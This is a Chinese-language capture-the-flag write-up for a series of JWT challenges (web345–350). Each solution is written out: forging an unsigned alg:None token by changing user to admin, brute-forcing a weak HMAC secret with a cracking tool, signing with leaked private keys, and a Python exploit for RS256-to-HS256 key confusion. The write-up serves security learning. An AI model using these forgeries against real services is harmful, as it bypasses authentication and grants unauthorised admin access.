web345

打开题目，只有一个where is flag?

用bp抓包一个，发现cookie有一串特别长的东西

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE3NTY1NDEyMzcsImV4cCI6MTc1NjU0ODQzNywibmJmIjoxNzU2NTQxMjM3LCJzdWIiOiJ1c2VyIiwianRpIjoiZjEwYzg5ZWY1MjdkNTE2YmYwZWM4ZDAzODE1YTgyZjMifV0

用base64解码一下，发现

{"alg":"None","typ":"jwt"}.[{"iss":"admin","iat":1756541237,"exp":1756548437,"nbf":1756541237,"sub":"user","jti":"f10c89ef527d516bf0ec8d03815a82f3"}]

将user修改为admin，重新编码，发送回cookie，得到flag

web346-347

跟上一题一样抓包，用base64解码一下

发现这次后面多了很多乱码，这是说明进行过加密

放入在线jwt解析网址，对称加密123456，将user修改为admin，重新加密回去

发回cookie，得到flag

web348

题目提示爆破，我们使用c-jwt-cracker工具进行爆破

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTc1NjU0Mjg1MywiZXhwIjoxNzU2NTUwMDUzLCJuYmYiOjE3NTY1NDI4NTMsInN1YiI6InVzZXIiLCJqdGkiOiJiNmU3Y2FkNTg2NzU3ZjU1YTI0NGZmMTIxNjI3ODUwMSJ9.hdMlqVnQEhQmqB2UdwPL4-Hr8iKqb0AMaTT16rLWRcA
Secret is "aaab"

显示密码aaab，用在线jwt网站，对称加密，发回cookie，得到flag

web349

题目给了附件

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
  var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
  res.cookie('auth',token);
  res.end('where is flag?');
  
});

router.post('/',function(req,res,next){
	var flag="flag_here";
	res.type('html');
	var auth = req.cookies.auth;
	var cert = fs.readFileSync(process.cwd()+'//public/public.key');  // get public key
	jwt.verify(auth, cert, function(err, decoded) {
	  if(decoded.user==='admin'){
	  	res.end(flag);
	  }else{
	  	res.end('you are not admin');
	  }
	});
});

发现有公钥和私钥的泄露，下载得到公钥和私钥

将公钥和私钥填入，修改user，发回cookie，得到flag

web350

这里能得到公钥，但找不到私钥

应该是对称密码，附上exp，将RS256加密改为HS256

import jwt
jwt_payload={
  "user": "admin",
  "iat": 1756543363
}

pub=open("D:\public.key","rb").read()
jwt_headers={
  "alg": "HS256",
  "typ": "JWT"
}

jwt_token=jwt.encode(jwt_payload,key=pub,algorithm='HS256',headers=jwt_headers,)

print(jwt_token)

得到jwt，发回cookie。post请求，得到flag